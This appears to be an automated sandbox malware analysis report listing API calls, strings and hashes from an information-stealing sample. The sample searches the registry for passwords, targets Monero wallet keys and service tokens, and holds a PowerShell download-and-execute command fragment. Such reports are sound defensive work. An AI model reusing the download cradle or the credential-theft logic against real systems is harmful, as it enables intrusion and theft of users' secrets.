                            • Part of subcall function 005472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0054733A
                            • Part of subcall function 005472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005473B1
                            • Part of subcall function 005472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0054740D
                            • Part of subcall function 005472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00547452
                            • Part of subcall function 005472D0: HeapFree.KERNEL32(00000000), ref: 00547459
                          • lstrcat.KERNEL32(00000000,005617FC), ref: 00547606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00547648
                          • lstrcat.KERNEL32(00000000, : ), ref: 0054765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0054768F
                          • lstrcat.KERNEL32(00000000,00561804), ref: 005476A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005476D3
                          • lstrcat.KERNEL32(00000000,00561808), ref: 005476ED
                          • task.LIBCPMTD ref: 005476FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: :
                          • API String ID: 3191641157-3653984579
                          • Opcode ID: f2e350da37d5372cba41a6db2d45e5299681c0b1f3be9a724509019ff2f19b23
                          • Instruction ID: 044deabaefb69752478f4a9cd8b8b0ef747b106a024b79909f6d9db1906845c1
                          • Opcode Fuzzy Hash: f2e350da37d5372cba41a6db2d45e5299681c0b1f3be9a724509019ff2f19b23
                          • Instruction Fuzzy Hash: 12318371A4010AEFDB04EBB4DC59DFF7B75FB88305B24810AF102A7251EB38A946CB65
                          APIs
                          • memset.MSVCRT ref: 00547314
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0054733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005473B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0054740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00547452
                          • HeapFree.KERNEL32(00000000), ref: 00547459
                          • task.LIBCPMTD ref: 00547555
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: Password
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0123F290,00000000,?,00560E2C,00000000,?,00000000), ref: 00558130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00558137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00558158
                          • __aulldiv.LIBCMT ref: 00558172
                          • __aulldiv.LIBCMT ref: 00558180
                          • wsprintfA.USER32 ref: 005581AC
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          APIs
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                            • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                          • InternetOpenA.WININET(00560DF7,00000001,00000000,00000000,00000000), ref: 0054610F
                          • StrCmpCA.SHLWAPI(?,0123FBD0), ref: 00546147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0054618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005461B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 005461DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0054620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00546249
                          • InternetCloseHandle.WININET(?), ref: 00546253
                          • InternetCloseHandle.WININET(00000000), ref: 00546260
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                          • lstrlen.KERNEL32(00000000), ref: 0054BC9F
                            • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0054BCCD
                          • lstrlen.KERNEL32(00000000), ref: 0054BDA5
                          • lstrlen.KERNEL32(00000000), ref: 0054BDB9
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          APIs
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00544FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00544FD1
                          • InternetOpenA.WININET(00560DDF,00000000,00000000,00000000,00000000), ref: 00544FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00545011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00545041
                          • InternetCloseHandle.WININET(?), ref: 005450B9
                          • InternetCloseHandle.WININET(?), ref: 005450C6
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00558426
                          • wsprintfA.USER32 ref: 00558459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0055847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0055848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00558499
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,0123F008,00000000,000F003F,?,00000400), ref: 005584EC
                          • lstrlen.KERNEL32(?), ref: 00558501
                          • RegQueryValueExA.ADVAPI32(00000000,0123EFD8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00560B34), ref: 00558599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00558608
                          • RegCloseKey.ADVAPI32(00000000), ref: 0055861A
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005576A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 005576AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0122BBF8,00000000,00020119,00000000), ref: 005576DD
                          • RegQueryValueExA.ADVAPI32(00000000,0123F140,00000000,00000000,?,000000FF), ref: 005576FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00557708
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0055773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0122BBF8,00000000,00020119,005576B9), ref: 0055775B
                          • RegQueryValueExA.ADVAPI32(005576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0055777A
                          • RegCloseKey.ADVAPI32(005576B9), ref: 00557784
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 16bee51e953570c8c45039db2b45897407176c75f8774393f6a1f05b6fd09a47
                          • Instruction ID: 292d2f52c82b46fda7cd745e4ecb21fef52fd798bb7d2d9fa0c603b26a19de2c
                          • Opcode Fuzzy Hash: 16bee51e953570c8c45039db2b45897407176c75f8774393f6a1f05b6fd09a47
                          • Instruction Fuzzy Hash: 9B0117B5A40308BBEB00DBE4DC49FAEBBB8FB48701F108556FA05A7291DA7455048B65
                          APIs
                          • CreateFileA.KERNEL32(:U,80000000,00000003,00000000,00000003,00000080,00000000,?,00553AEE,?), ref: 005592FC
                          • GetFileSizeEx.KERNEL32(000000FF,:U), ref: 00559319
                          • CloseHandle.KERNEL32(000000FF), ref: 00559327
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID: :U$:U
                          • API String ID: 1378416451-4244293621
                          • Opcode ID: b06fb96695490f2d277ed62c687cc1c785d4db56b4d43b34a5565ba5e32ca69f
                          • Instruction ID: cfee92aecded88b162ce08e39543b465e4ee8bd36b1d6ad090f4dc942507a950
                          • Opcode Fuzzy Hash: b06fb96695490f2d277ed62c687cc1c785d4db56b4d43b34a5565ba5e32ca69f
                          • Instruction Fuzzy Hash: 5DF0AF74E40208FBEB10DFB4DC18F9E7BB9FB48311F21CA55BA11A72C0D67896009B44
                          APIs
                          • memset.MSVCRT ref: 005540D5
                          • RegOpenKeyExA.ADVAPI32(80000001,0123E668,00000000,00020119,?), ref: 005540F4
                          • RegQueryValueExA.ADVAPI32(?,0123F560,00000000,00000000,00000000,000000FF), ref: 00554118
                          • RegCloseKey.ADVAPI32(?), ref: 00554122
                          • lstrcat.KERNEL32(?,00000000), ref: 00554147
                          • lstrcat.KERNEL32(?,0123F500), ref: 0055415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValuememset
                          • String ID:
                          • API String ID: 2623679115-0
                          • Opcode ID: 590c240c1f3a23c0cde07b4701cb8cf0c253bc969a2b188c03c21645385ecbb3
                          • Instruction ID: 788d5956d0849b38476e53e25d0df026bbd32bc410b35bf00aa33cbf5d60ca0a
                          • Opcode Fuzzy Hash: 590c240c1f3a23c0cde07b4701cb8cf0c253bc969a2b188c03c21645385ecbb3
                          • Instruction Fuzzy Hash: FD41BAB6D401087BDB14EBA0DC5AFFD777DB788300F008559B61A56181EA755B8C8B92
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                          • LocalFree.KERNEL32(0054148F), ref: 00549A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 85bf32218a5a8cde99109713e77b4f2948a1f5fcafcfd9be88ecfc99463529b2
                          • Instruction ID: a57ad703dd1ff59bce20c082efda804b174ce4f8819002a61e2aa5c29e7e9215
                          • Opcode Fuzzy Hash: 85bf32218a5a8cde99109713e77b4f2948a1f5fcafcfd9be88ecfc99463529b2
                          • Instruction Fuzzy Hash: A7312D74A00209EFDB14CF95C986BEE7BB5FF48345F208159E911A7290D778A941CFA1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Typememset
                          • String ID:
                          • API String ID: 3530896902-3916222277
                          • Opcode ID: 07f245fd48b73aff25ebfb778a9af897bde7204d4775b670915d28a41e9c8466
                          • Instruction ID: ce9281dff85c9b5005af000fd7b2753ae4e2eba6219be91b96ecabee3c26b608
                          • Opcode Fuzzy Hash: 07f245fd48b73aff25ebfb778a9af897bde7204d4775b670915d28a41e9c8466
                          • Instruction Fuzzy Hash: 3241E77110079C5EDB218B248CA4FFB7FF8AF45705F1448A9ED8A86182D271AA49CF60
                          APIs
                          • lstrcat.KERNEL32(?,0123F548), ref: 005547DB
                            • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00554801
                          • lstrcat.KERNEL32(?,?), ref: 00554820
                          • lstrcat.KERNEL32(?,?), ref: 00554834
                          • lstrcat.KERNEL32(?,0122A7C0), ref: 00554847
                          • lstrcat.KERNEL32(?,?), ref: 0055485B
                          • lstrcat.KERNEL32(?,0123E588), ref: 0055486F
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 00558D90: GetFileAttributesA.KERNEL32(00000000,?,00541B54,?,?,0056564C,?,?,00560E1F), ref: 00558D9F
                            • Part of subcall function 00554570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00554580
                            • Part of subcall function 00554570: RtlAllocateHeap.NTDLL(00000000), ref: 00554587
                            • Part of subcall function 00554570: wsprintfA.USER32 ref: 005545A6
                            • Part of subcall function 00554570: FindFirstFileA.KERNEL32(?,?), ref: 005545BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: 6bd2454cd91e71745834770d14c05a7739a8061b25ea5da2ea7b25e9685ad7b1
                          • Instruction ID: 917364238f3c4f99cafae1a2679d49ade54b1f4138dbc749ce9fe54ff895cede
                          • Opcode Fuzzy Hash: 6bd2454cd91e71745834770d14c05a7739a8061b25ea5da2ea7b25e9685ad7b1
                          • Instruction Fuzzy Hash: 2E3173B294020967DB10FBB0DC99EE9777CBB88701F40458AB715A6081EE7897CD8FA5
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00552D85
                          Strings
                          • <, xrefs: 00552D39
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00552CC4
                          • ')", xrefs: 00552CB3
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00552D04
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: 6ff91c324b68020fbcc8230351c50ce9e8198a4d0c4ac3470f06ba216abb055b
                          • Instruction ID: 24d1e7c0bf4614fac62893615a8166f8a75fdf57b89dc96d87fe0197a2e9524a
                          • Opcode Fuzzy Hash: 6ff91c324b68020fbcc8230351c50ce9e8198a4d0c4ac3470f06ba216abb055b
                          • Instruction Fuzzy Hash: 2D41B171C102099ADB14EFA0C8A6BEDBF78BF54301F50421AF916A7191EF746A4ECF91
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00549F41
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 1e3035051724565a3344e842acfe1305daffd509f9f779bbba526b2ebba82752
                          • Instruction ID: d8d240c530a86402c7ba46dfad72902b8472c72df92b125ef9691fc6f89524f6
                          • Opcode Fuzzy Hash: 1e3035051724565a3344e842acfe1305daffd509f9f779bbba526b2ebba82752
